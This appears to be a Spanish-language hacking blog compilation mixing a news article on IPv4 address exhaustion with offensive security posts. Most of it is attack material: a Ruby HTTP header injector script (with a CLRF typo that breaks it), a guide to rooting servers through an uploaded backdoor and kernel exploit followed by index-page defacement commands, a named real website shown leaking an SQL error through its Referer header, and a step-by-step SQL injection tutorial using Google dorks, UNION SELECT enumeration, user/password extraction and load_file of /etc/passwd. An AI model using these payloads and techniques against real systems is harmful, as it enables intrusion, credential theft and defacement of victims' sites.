Bypassear limite de busqueda de dorks en google

Codigo de parte de DarkMindz

Descarga: http://rapidshare.de/files/39576933/Codigo_Bypass.txt.html

Header Injector by pRotos

Header Injector by pRotos

pRotos- "Prototipo de un posible inyector para headers HTTP. Puede inyectar en las cookies, el referent, y el navegador ( User-Agent), no es final, cada uno que cambie lo que quiera."...

#Inyecta codigo en los headers HTTP
#Referent, User-Agent y cookie.
#Coded by pRotos (protos.nu@gmail.com)

require 'socket'
host=ARGV[0]
puts "*Inyector en Headers*[v0.0]"
puts " Coded by pRotos"
puts "Path para la request:"
path=gets.chomp
puts "Inyeccion en Referent:"
ref=gets.chomp
puts "Inyeccion en User-Agent (Navegador):"
usag=gets.chomp
puts "Inyeccion en la cookie:"
cook=gets.chomp
CRLF = "\r\n"
req = "GET #{path} HTTP/1.1#{CRLF}Host: #{host}#{CRLF}Referer: #{ref}#{CLRF}User-Agent: #{usag}#{CLRF}Cookie: #{cook}#{CLRF*2}"
sock=TCPSocket.new(host, 80)
sock.print req
sock.close()

Blind MySql Inyexion

Articulo escrito por ka0x, integrante del D.O.M. Team, donde explica teoria y practica sobre inyecciones a ciegas en MySQL. (11 paginas pdf).

Link: Online
Descarga: Acá

Crisis por agotamiento de direcciones IP

El motivo de esta crisis inminente es sencillo, aunque la solución es complicada. Y es que las direcciones IP, esas que identifican a los dispositivos que se conectan a internet y permiten su acceso, se están acabando.

Y si es usted una de las muchas personas que creen que resulta complicado encontrar un nombre de usuario o una dirección de correo electrónico libre, una que alguien no haya ocupado ya, espere a que el contador llegue a cero. Para entonces, a mediados de 2011, le será del todo imposible conseguir, incluso, una simple conexión que permita a su ordenador acceder a internet.

El motivo de esta crisis inminente es sencillo, aunque la solución es complicada. Y es que las direcciones IP, esas que identifican a los dispositivos que se conectan a internet y permiten su acceso, se están acabando. De hecho, los datos de este mismo mes indican que en todo el mundo ya están «cogidas» el 85 por ciento de los cerca de 4.300 millones de direcciones IP que permite el protocolo de internet en uso (IPv4, o Internet Protocol versión 4). Y eso, en un momento de auge del número (y la variedad) de dispositivos capaces de conectarse a la red de redes es una mala, muy mala noticia.

Situación crítica

Así lo subraya también un informe elaborado por la OCDE que será presentado en Corea el 17 y 18 de junio, durante la próxima cumbre ministerial. «La situación -dice textualmente el documento- es crítica para el futuro de la economía de internet».

El informe urge a los gobiernos de todo el mundo para que actualicen la versión actual (IPv4) a la nueva IPv6, que en la práctica puede ofrecer un número ilimitado de direcciones IP (en realidad, unos 340 sextillones de ellas, lo que supone cerca de 670.000 billones de direcciones por cada milímetro cuadrado del planeta).

En palabras de Vinton Cerf, uno de los «creadores» de internet y en la actualidad vicepresidente mundial de Google, «la hora de IPv6 ha llegado». Su implantación será, según el experto, la siguiente gran revolución tecnológica a la que se deberá enfrentar el mundo.

Que las direcciones IP disponibles no iban a durar siempre es algo que se sabe desde hace más de una década. Pero a pesar de que el nuevo protocolo (IPv6) fue desarrollado a mediados de los noventa, aún no ha sido adoptado por la inmensa mayoría de los países y organizaciones.

Un desastre anunciado

El problema principal es que ambos protocolos no son compatibles entre sí, de modo que los dispositivos que se conectan a internet por medio de uno de ellos no pueden hacerlo por vía del otro. En la actualidad, la mayor parte de los dispositivos electrónicos preparados para IPv6 se encuentran en Asia, especialmente en China, Japón, Corea y Taiwan. Y aunque las nuevas versiones de los principales sistemas operativos (Windows Vista, MacOS X...) también están ya preparados, lo cierto es que nadie ha dado aún el pistoletazo de salida.

Hoy, los proveedores de servicio a internet gestionan la escasez restringiendo al máximo la asignación de nuevas direcciones. Soluciones técnicas como la asignación de IP variables (es decir, direcciones que se renuevan en cada nueva conexión) ha permitido un mejor aprovechamiento de las direcciones existentes. Igual que la Traducción de Direcciones de Red (NAT), un sistema que permite a empresas y proveedores asignar paquetes de IP privadas, que sin embargo tienen la limitación de no permitir el pleno acceso a la red.

Recursos que han servido, como mucho, para tener un respiro. Un respiro, como se ha visto, con fecha de caducidad. Y el contador sigue bajando...

Fuente

# Hacinedo root en un servidor.

# Haciendo root en un servidor.
# Author: m0x.lk | Marcos
# NOT CRIME!

./Menu

1. Presentacion
a) By -
b) Definicion root
2. Herramientas
a) BackDoor
b) Putty
3. Atacando
a) Web Victima
b) Exloit
c) Rooteando
4. Despedida

-----------------------------------

1. Presentacion
a) by -
Hola, bueno esto seria manual de como rootear en servidores (Siempre que encontremos el kernel vulnerable).
Escrito por m0x.lk | Marcos.

En J0y!

-----------------------------------

b) Definicion root

root: Cuenta ADMINISTRADOR, con todos los permisos.
Se reconoce como SUPERUSUARIO - Admin - root - etc.
Este usuario 'root' es el cual ejecuta funciones que el usuario normal no logra.

-----------------------------------

2. Herramientas
a) BackDoor

Bueno, la BackDoor [Puerta Trasera] seria con la cual nos conectaremos al host y nos conectaremos.
Busquemos la que mas nos guste, sea Perl - PHP - JV - O lo que sea.
Les recomiendo: data chaoz - r0nin - bd0rk - etc.

-----------------------------------

b) Putty

Un conector de Windows a unix o de unix a unix, con metodos SSH - TelNet - Etc.
Este es un software libre, con el cual podremos conectarnos al sitio para lograr el root.

-----------------------------------

3. Atacando
a) Web Victima

Bueno, esto seria:
_Encontrar una web, ya teniendo una shell subida o sabiendo el kernel de la web victima.
Deberemos tener un metodo 'upload' para subir la backdork.
No dare explicaciones de como conseguir webs vulnerable, por que no quiero crear script kiddies ni menos defacers que no saben que estan haciendo :/.
Seria bueno que ustedes consiga la web vulnerable y ya con shell subida (No necesariamente RFI, si no un 0day, colarnos por ftp, lo que sea).

-----------------------------------

b) Exloit

Bien, una ves que sabemos que kernel es, debemos buscar nuestro Exploit con el cual rootearemos...
Digamos EXAMPLE el kernel: Sun Solaris 10 ypudated
Ya tenemos sitios donde buscar los exploit, securityfocus - milw0rm - google - etc.
Example EXPLOIT ROOT: Root Exploit SUN SOLARIS o otro soft o script.
Bien, ya tenemos el EXPLOIT, ahora a trabajar.

-----------------------------------

c) Rooteando

Bien, este paso es donde tenemos accion de verdad...
Bueno, 1ro que nada, debemos tener ya arriba la backdoor...
Claro que ya lista para usarla, vamos al Putty y nos conectamos a la backdoor...
Host: ip.ip.ip.ip PORT (Victim ID)
Debemos poner la backdoor con CHMOD 777 Giñar
Bien, ya la tenemos conectadas Cheesy
Ahora, subimos nuestro Exploit con el cual vamos a conseguir rootear el servidor.
Al exploit tambien le deberemos dar chmod 777, asi lo podemos manejar a pleno D:.
Bien, con el exploit subido y la backdoor ya corrida corremos el exploit paso a seguir y conseguimos el servidor OWNEd (En nuestras manos)
Correr el exploit seria: chmod 777 exploit; ./exploit (ejemplo) acordarse del chmod...
Luego, ponemos ID y verificamos si somos adminsitrador..
id
uid=0 (root) gid=0 (root)
Bien! tenemos el servidor en nuestras manos...
Ahora recordemos que es unix y debemos ejecutar funciones de ellas, ejemplo:
find / -name "index.php" -exec cp /ruta/owned.php {} \;
y WALA, index remplazado Cheesy
Recordemos que podemos descargar ficheros y todo, miremos la BD y claro...
Si tenemos el servidor rooteado enterito, tiremos un reverse DNS a ver que sites tenemos montados ahi a ver si ligamos un MASS DEFACEMENT!

-----------------------------------

4. Despedida

Bueno, esto fue: rooteando un servidor (BASICAMENTE) y para tener una idea de como seria.

Escrito y ideado por: m0x.lk | Marcos

Tu sabes que esto no es ilegal (H)

m0x.lk!

-----------------------------------

_END_

[Video] Sql Inyexion - Ingles

Video, algo raro para mi.. en ingles muy pero muy interesante

Link:
http://rapidshare.com/files/88459750/SQL_File_Manip-NoSound.wmv.html

Sql Inyeccion en Headers

Muchas veces el referer es guardado dentro de una db sql permitiendo ser explotado en algunos casos.

http://www.xonic-solutions.de/conditions.php

este sitio guarda la sigueitne informacion:

customer_id, full_name, session_id, ip_address, time_entry, time_last_click, last_page_url, page_desc, referer_url

el header es:
Host: www.xonic-solutions.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept:

ext/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/ png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: '
Cookie: xploidID=wZIJaVN8VhWLpqhGJzVPIwE5xbXYlp9aasOZEEtHBmPw_H7l2rwIMR8aP8B-7i5A
Cache-Control: max-age=0


como se dieron cuenta el referer se cambio por '

y da el error:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1

insert into user_tracking (customer_id, full_name, session_id, ip_address, time_entry, time_last_click, last_page_url, page_desc, referer_url) values ('', 'Guest', '57244m5u19oq8nh2huq1mfp37dknf42p', '83.233.168.232', '1211025037', '1211025037', '/cms_content.php?cID=2', 'HEADING_TITLE', ''')

un lugar para una inyexion :D

Fuente: DarkMindz

Inyecciones SQL básico en códigos PHP

/* Inyecciones SQL básico en códigos PHP
by Syst3m-c0d3r;
*/


print "indice";

$1="Presentacion";
$2="Buscando victimas";
$3="Testeando el bug";
$4="Sacando cantidad de tablas";
$5="Tratando de sacar el user y pass";
$6="load_file: Cargar el fichero passwd";
$7="Despedida";

print "-----------------------------------------------------------------------------";


print '

Presentacion.-

Hola! Yo soy Syst3m-c0d3r, tal ves algunos me conoscan como Panther Root o Phanter RooT

Hoy voy a hacer este paper sobre inyecciones SQL (Basicos)
Es con fines educativos, no me responsabilizo del mal uso que le den a esto.

espero que les sirva :D

empezemos...
';

print "-----------------------------------------------------------------------------";


print '


Buscando Victimas.-

Un buen dork para buscar victimas vulnerables podria ser algo como un CMS de noticias:

inurl:noticias.php?id=
inurl:nota.php?id=
inurl:noticias.php?noticia=

o bien:

inurl:index.php?id=

';

print "-----------------------------------------------------------------------------";

print '

Testeando el bug.-

bueno yo encontre una pagina vulnerable:

noticias.php?id=

ahora para testear la vulnerabilidad ponemos:

noticias.php?id='

Si es vulnerable nos dará un mensaje como:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

o similar

en la mayoria de los casos tambien hay XSS:

noticias.php?id='REMOTEEXECUTION =D

bueno, ahora empezemos a explotar =D
';

print "-----------------------------------------------------------------------------";

print '

Sacando cantidad de tablas.-

Vamos a usar UNION ALL SELECT:

http://www.w3schools.com/sql/sql_union.asp

noticias.php?id=-1+UNION+ALL+SELECT+1

Esto nos va a provocar un error como:

The used SELECT statements have a different number of columns

Esto quiere decir que tiene mas de 1 tabla

entonces hay que seguir... le agregamos un ,2, quedaria asi:

noticias.php?id=-1+UNION+ALL+SELECT+1,2

si nos tira el mismo error le ponemos ,3

noticias.php?id=-1+UNION+ALL+SELECT+1,2,3

y asi hasta que nos imprima unos numeros


La inyeccion me quedó así:

noticias.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14

Esto quiere decir que la base de datos tiene 14 tablas

A mi me imprimió el 2, el 3 y el 5..


';

print "-----------------------------------------------------------------------------";

print '

Tratando de sacar el user y pass.-

bueno ahora que tenemos la mitad de la inyeccion armada vamos a usar FROM.

Esto es para elegir que tabla vamos a usar

Esto es a las pruebas, es decir, no podemos sacar los nombres de las tablas al menos que sea mysql 5.0, pero eso lo explicare mas adelante...

ahora que tenemos la inyeccion ponemos al final +FROM+ y un posible nombre de la tabla

la mayoria de las veces es usuarios... o members.. o users, pero hay q probar


noticias.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+usernames

nos quedaria algo asi

Si nos tira este error:

Table 'NOMBRE_DE_LA_BASE_DE_DATOS.usernames' doesn't exist

es que no existe, por lo tanto, hay que probar otras formas:


noticias.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+usuarios

Bingo!! No me tiro ningun error, imprimio los numeros 2, 3 y 5 como antes!!

La tabla de usuarios en mi caso es "usuarios" jeje


Ahora....... A sacar el user y pass!!!

para esto tenemos que probar tambien !! el nombre de la COLUMNA...

Esto se prueba en reemplazo de los numeros que se imprimen

es decir,, si se imprime el 2 el 3 y el 5 podemos cambiar el 5 por el nombre posible de la columna.. quedaria algo asi:

noticias.php?id=-1+UNION+ALL+SELECT+1,2,3,4,usuario,6,7,8,9,10,11,12,13,14+from+usuarios

Unknown column 'usuario' in 'field list'

Ups!! No existe!! a seguir probando

Bingo!! me imprimio el 2, el 3 y el nombre de usuario :D:D:D

Ahora a buscar el password =)


noticias.php?id=-1+UNION+ALL+SELECT+1,2,3,4,concat(usuario,0x3a3a,clave),6,7,8,9,10,11,12,13,14+from+usuarios

Unknown column 'clave' in 'field list'

No existe

NOTA: 0x3a3a es Hexadecimal... 0x indica un valor hex y 3a3a ekivale a ::

concat sirve para imprimir 2 columnas en la misma tabla

noticias.php?id=-1+UNION+ALL+SELECT+1,2,3,4,concat(usuario,0x3a3a,password),6,7,8,9,10,11,12,13,14+from+usuarios

Se!! ya tenemos el user y pass

ahora podemos buscar el panel de admin

www.ejemplo.com/admin
www.ejemplo.com/login
www.ejemplo.com/login.php
www.ejemplo.com/admin.php

etc...

hay q probar...
';

print "-----------------------------------------------------------------------------";

print '

load_file: Cargar el fichero passwd.-

Load_File() es una funcion de mysql (no todas las versiones) para cargar ficheros.. no solo el de passwd. pero yo voy a mostrar un ejemplo con este...

para cargar ficheros tenemos que hacerlo en una tabla de las q se imprime y hacerlo con valor hexadecimal..

es decir, quedaria:

noticias.php?id=-1+UNION+ALL+SELECT+1,2,3,4,load_file(FICHERO CODIFICADO EN HEXADECIMAL),6,7,8,9,10,11,12,13,14+from+mysql.user--

NOTA: hay que hacerlo con la tabla mysql.user...

es decir... +from+mysql.user--

NOTA: -- (2 guiones) evita todo codigo que sigue,, de sql

/etc/passwd en hexadecimal es: 2f6574632f706173737764

por lo tanto quedaria:

load_file(0x2f6574632f706173737764)

NOTA: no olvidarse declarar que es hexadecimal.. es decir.. 0x adelante de todo


por lo tanto la inyeccion kedaria:

noticias.php?id=-1+UNION+ALL+SELECT+1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8,9,10,11,12,13,14+from+mysql.user--

';

print "-----------------------------------------------------------------------------";

print '

Despedida .-

Bueno este tutorial esta dedicado a todo el foro REMOTE EXECUTION y en especial a Biser!

Un saludo y espero que les pueda servir.. ante cualquier duda:

Panther_RooT@ArgentoHack.com.ar!!

Saludos =)

';

exit();